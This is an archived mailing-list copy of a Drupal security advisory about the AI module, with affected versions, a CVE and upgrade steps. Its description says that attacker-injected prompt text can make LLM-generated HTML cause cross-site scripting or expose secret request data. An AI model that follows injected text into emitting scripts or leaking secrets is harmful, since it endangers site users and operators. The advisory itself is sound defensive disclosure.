Zum Inhalt springen.
Sympa Menü

it-securitynotifies - [IT-SecNots] [Security-news] AI (Artificial Intelligence) - Moderately critical - Information Disclosure / Cross-site Scripting - SA-CONTRIB-2026-054

it-securitynotifies AT lists.piratenpartei.de

Betreff: Sicherheitsankündigungen

Listenarchiv

[IT-SecNots] [Security-news] AI (Artificial Intelligence) - Moderately critical - Information Disclosure / Cross-site Scripting - SA-CONTRIB-2026-054


Chronologisch Thread  
  • From: security-news AT drupal.org
  • To: security-news AT drupal.org
  • Subject: [IT-SecNots] [Security-news] AI (Artificial Intelligence) - Moderately critical - Information Disclosure / Cross-site Scripting - SA-CONTRIB-2026-054
  • Date: Wed, 24 Jun 2026 18:36:55 +0000
  • Archived-at: <>
  • Authentication-results: lists.piratenpartei.de; dkim=pass header.d=drupal.org header.s=default header.b=NfFvaWjZ; dkim=fail ("body hash did not verify") header.d=drupal.org header.s=f34odw3mfzgsrgyn3evjayysxxl6jizn header.b="Zk3M90/x"; dkim=fail ("body hash did not verify") header.d=amazonses.com header.s=hsbnp7p3ensaochzwyq5wwmceodymuwv header.b=zhPyQSJT; dmarc=pass (policy=none) header.from=drupal.org; spf=pass (lists.piratenpartei.de: domain of security-news-bounces AT drupal.org designates 2605:bc80:3010::138 as permitted sender) smtp.mailfrom=security-news-bounces AT drupal.org
  • Dkim-filter: OpenDKIM Filter v2.11.0 smtp1.osuosl.org A669383B63
  • Dkim-filter: OpenDKIM Filter v2.11.0 smtp1.osuosl.org 202D181EE1
  • Dmarc-filter: OpenDMARC Filter v1.4.2 smtp1.osuosl.org 202D181EE1
  • Feedback-id: ::1.us-west-2.eaokZ1GT8utLqfMHQoyOsEFVrSIzzS6R+14LP6WIIUY=:AmazonSES
  • List-archive: <>
  • List-id: <security-news.drupal.org>

View online: https://www.drupal.org/sa-contrib-2026-054

Project: AI (Artificial Intelligence) [1]
Date: 2026-June-24
Security risk: *Moderately critical* 14 ∕ 25
AC:Complex/A:None/CI:Some/II:Some/E:Theoretical/TD:Default [2]
Vulnerability: Information Disclosure / Cross-site Scripting

Affected versions: <1.2.17 || >=1.3.0 <1.3.8 || >=1.4.0 <1.4.3
CVE IDs: CVE-2026-13234
Description: 
The module and certain submodules (AI Automators, AI Translate, AI API
Explorer, AI Content Suggestions) provide the ability to use an LLM to
generate HTML or Markdown and preview it in a browser.

Under certain circumstances, rendering of this HTML can lead to Cross Site
Scripting, or exposing secret communications in the context of the LLM
request.

This vulnerability is mitigated by the fact that an attacker must be able to
inject text into prompts to create an attack.

Solution: 
Install the latest version:

* If you use the AI module 1.2.16, upgrade to AI 1.2.17 [3]
* If you use the AI module 1.3.7 upgrade to AI 1.3.8 [4]
* If you use the AI module 1.4.2 upgrade to AI 1.4.3 [5]

Reported By: 
* Drew Webber (mcdruid) [6] of the Drupal Security Team

Fixed By: 
* Artem Dmitriiev (a.dmitriiev) [7]
* Abhisek Mazumdar (abhisekmazumdar) [8]
* AKHIL BABU (akhil babu) [9]
* Marcus Johansson (marcus_johansson) [10]

Coordinated By: 
* Bram Driesen (bramdriesen) [11] of the Drupal Security Team
* Drew Webber (mcdruid) [12] of the Drupal Security Team
* Juraj Nemec (poker10) [13] of the Drupal Security Team

Security
issue: https://git.drupalcode.org/security/3586527-ai-security/-/work_items/1
[14]
------------------------------------------------------------------------------
Contribution record [15]

[1] https://www.drupal.org/project/ai
[2] https://www.drupal.org/security-team/risk-levels
[3] https://www.drupal.org/project/ai/releases/1.2.17
[4] https://www.drupal.org/project/ai/releases/1.3.8
[5] https://www.drupal.org/project/ai/releases/1.4.3
[6] https://www.drupal.org/u/mcdruid
[7] https://www.drupal.org/u/admitriiev
[8] https://www.drupal.org/u/abhisekmazumdar
[9] https://www.drupal.org/u/akhil-babu
[10] https://www.drupal.org/u/marcus_johansson
[11] https://www.drupal.org/u/bramdriesen
[12] https://www.drupal.org/u/mcdruid
[13] https://www.drupal.org/u/poker10
[14] https://git.drupalcode.org/security/3586527-ai-security/-/work_items/1
[15] https://new.drupal.org/contribution-record?source_link=https%3A//www.drupal.org/node/3605496

_______________________________________________
Security-news mailing list -- security-news AT drupal.org
To unsubscribe send an email to security-news-leave AT drupal.org
Unsubscribe at

  • [IT-SecNots] [Security-news] AI (Artificial Intelligence) - Moderately critical - Information Disclosure / Cross-site Scripting - SA-CONTRIB-2026-054, security-news, 24.06.2026

Archiv bereitgestellt durch MHonArc 2.6.19+.

Seitenanfang